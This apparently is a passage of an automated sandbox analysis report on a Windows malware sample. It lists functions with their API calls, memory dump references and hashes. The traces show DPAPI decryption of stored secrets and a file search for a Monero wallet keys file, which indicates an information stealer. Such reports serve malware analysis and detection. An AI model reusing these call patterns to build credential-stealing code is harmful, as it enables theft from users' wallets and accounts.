                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: c3426beec34639b9793e91af6cac8690dd36ad61ec0fd71c0954f3c99700e8de
                              • Instruction ID: 05f1b3bc3af1d4f645ac41dc94f11558214c1e37fa0e8384b8d1c21eb82cb549
                              • Opcode Fuzzy Hash: c3426beec34639b9793e91af6cac8690dd36ad61ec0fd71c0954f3c99700e8de
                              • Instruction Fuzzy Hash: FC1100B0200209AFDB04CFA4E889FBB37AAAF99314F10945CF919CB250DB75E841DB60
                              Function 001B9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                              • LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 618f8f5427517b3b1e5f18acddd5f1b53a9c0f0186491cfd0e95bea30fc7a881
                              • Instruction ID: e19e4910c0ba1bc18329fdd64a01906db40ac23f598819bc2b830a8624ae11f3
                              • Opcode Fuzzy Hash: 618f8f5427517b3b1e5f18acddd5f1b53a9c0f0186491cfd0e95bea30fc7a881
                              • Instruction Fuzzy Hash: 8511A4B4240308AFEB11CF64DC95FAA77B9FB89700F208058FA199B390C7B5A901CB50
                              Function 001C7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EEDB10,00000000,?,001D0E10,00000000,?,00000000,00000000), ref: 001C7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EEDB10,00000000,?,001D0E10,00000000,?,00000000,00000000,?), ref: 001C7A7D
                              • wsprintfA.USER32 ref: 001C7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 19c44fa74563232e8f852f10973a551bff6926a07384420d3ed7d4fda33cd754
                              • Instruction ID: 91bf6e597dbfbdc51fd42ff8b65078d819e09e866767fa84c1c4a201d079aede
                              • Opcode Fuzzy Hash: 19c44fa74563232e8f852f10973a551bff6926a07384420d3ed7d4fda33cd754
                              • Instruction Fuzzy Hash: DF118EB1945618EFEB208B54DC49FA9BBB8FB04761F10479AE90A932C0D7B49E40CF51
                              Function 001C3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(001CE118,00000000,00000001,001CE108,00000000), ref: 001C3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001C37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 287cb20d6307de5979b8d53c9d4e4dc4f414a0d6f1184e07f495e15e61c83f02
                              • Instruction ID: 821665f30b353f1e57d2503bd73bde8b52fa0e330f1bb384f29786abfd47d053
                              • Opcode Fuzzy Hash: 287cb20d6307de5979b8d53c9d4e4dc4f414a0d6f1184e07f495e15e61c83f02
                              • Instruction Fuzzy Hash: 1641E970A40A289FDB24DB58CC95F9BB7B5BB58702F4082D8E618E72D0D771AE85CF50
                              Function 001B9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001B9B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 001B9BA3
                              • LocalFree.KERNEL32(?), ref: 001B9BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 02e93d222d0e7a5aaf27e62783644c358ca561a36fb3dc33252f36c589374ea4
                              • Instruction ID: dc8a8d0d108adfccc7b74891cd146862bdda3b3e93c542138b4d382a2ac98128
                              • Opcode Fuzzy Hash: 02e93d222d0e7a5aaf27e62783644c358ca561a36fb3dc33252f36c589374ea4
                              • Instruction Fuzzy Hash: F911BAB4A00209DFDB05DFA4D985EAE77B9FF88300F104568E91597350D774AE11CF61
                              Function 00586F58 Relevance: 3.3, Strings: 2, Instructions: 830COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _ph$yXW
                              • API String ID: 0-2400651086
                              • Opcode ID: e3c7ece6a3a80bd0a3ce7284d8f08eaae1eaa4283a976b8ef5ff089c7352ab4a
                              • Instruction ID: a34cae168c8a267cc0b54430ff76acb54e1ad2fdc495190205d87370cb40f74f
                              • Opcode Fuzzy Hash: e3c7ece6a3a80bd0a3ce7284d8f08eaae1eaa4283a976b8ef5ff089c7352ab4a
                              • Instruction Fuzzy Hash: 2E421BF3A0C2049FE3046E2DEC8567AF7E9EF94720F164A3DEAC4C3744E93599058696
                              Function 001BF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001D15B8,001D0D96), ref: 001BF71E
                              • StrCmpCA.SHLWAPI(?,001D15BC), ref: 001BF76F
                              • StrCmpCA.SHLWAPI(?,001D15C0), ref: 001BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 001BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 001BFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a88b6641531f37e2192742d09cec6bd49b365e8aaeb3368c6c4b309dc5f8ac59
                              • Instruction ID: 15c0cb8829528a3d581c7b3a5bc66f1f40550c6542dfc6e22d1afb1c3b08ccb1
                              • Opcode Fuzzy Hash: a88b6641531f37e2192742d09cec6bd49b365e8aaeb3368c6c4b309dc5f8ac59
                              • Instruction Fuzzy Hash: 4911787184010D6BDB15EB60DC55FED7378AF30304F8042ADE51A57492EF306B4ACB52
                              Function 006403A9 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #%m
                              • API String ID: 0-464343836
                              • Opcode ID: c98f4e1c7eb29303c02179b8c3e959a75b7c0c155b781da1578fe59851834a2e
                              • Instruction ID: f43de9c9ff12a5a74990b8c30779b10442358902100c1df54a6f757bc1f51aff
                              • Opcode Fuzzy Hash: c98f4e1c7eb29303c02179b8c3e959a75b7c0c155b781da1578fe59851834a2e
                              • Instruction Fuzzy Hash: D32121B251C2109FE359FE58D881A6AF7E5FF58310F16092DEBD5C3350D63168108B97
                              Function 005698E0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b54150de800332754fddfc1c51f30082321bfbf448099f900d434480aa75c748
                              • Instruction ID: 9e34c51a7b900737254dd48307a956dab08a5aa599e5cec272d3eb1f24e58245
                              • Opcode Fuzzy Hash: b54150de800332754fddfc1c51f30082321bfbf448099f900d434480aa75c748
                              • Instruction Fuzzy Hash: A0512BF3D082105BF318AE2DDC95776B7D6EB54320F1B463DEA8997B84E93969008286
                              Function 004EA30C Relevance: .2, Instructions: 172COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6442d70e482c7efa2fc58bd0c4eead74c05dabb3681b7f752347058778564a98
                              • Instruction ID: 043302bbaca6d05f92a036686433bd578094227c291db5b5c71749555301430d
                              • Opcode Fuzzy Hash: 6442d70e482c7efa2fc58bd0c4eead74c05dabb3681b7f752347058778564a98
                              • Instruction Fuzzy Hash: F551B5F3A082005FE7106E6DEC9176AF7E5EB98720F1A453DEBC4D3780E9395C014696
                              Function 004B0A92 Relevance: .2, Instructions: 153COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fe924137f374b5a00439f020506bbd6af8ef4f33eb4ac030033f046b5bb6032
                              • Instruction ID: 566d85085b4bb7d78347c2992a4446f7ecd1a611aceeb7cc27d66e05bed56555
                              • Opcode Fuzzy Hash: 4fe924137f374b5a00439f020506bbd6af8ef4f33eb4ac030033f046b5bb6032
                              • Instruction Fuzzy Hash: 0241F4F3E086108FE7449E78DD8572AB7E2EB94310F1A853CDAC993384E9395C048686
                              Function 00504ED1 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 94b357c5a0389a6fc0dad0aa1018adce0780d67ef4106b319a00b342cf1f27df
                              • Instruction ID: cc3d4080b4e96d1be053d1d8e3630ccb6fec8057d43c8004155b112d273c81e3
                              • Opcode Fuzzy Hash: 94b357c5a0389a6fc0dad0aa1018adce0780d67ef4106b319a00b342cf1f27df
                              • Instruction Fuzzy Hash: BD413CB3A0C2006BE34C5E2CDC5677AB7E9EF94360F1A452EE6C9D7780D5795C018786
                              Function 0048B1C9 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
